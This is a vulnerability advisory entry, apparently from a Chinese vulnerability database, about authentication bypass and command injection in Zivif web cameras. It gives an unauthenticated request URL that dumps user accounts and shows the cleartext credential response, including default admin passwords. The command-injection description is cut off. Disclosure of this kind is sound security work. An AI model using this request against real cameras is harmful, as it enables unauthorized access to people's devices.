Zivif Web Cameras Multiple Vulnerabilities CVE-2017-17105, CVE-2017-17106, CVE-2017-17107

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

Implementation of access controls is Zivif cameras is severely lacking.As a result, CGI functions can be called directly, bypassing authentication checks. This was first identified with the following request (CVE-2017-17106) `http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser` Cameras respond to this with: ``` var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="admin2"; var password2="admin"; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0 ``` Credentials are returned in cleartext to the requester. In exploring, unauthenticated remote command injection is...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息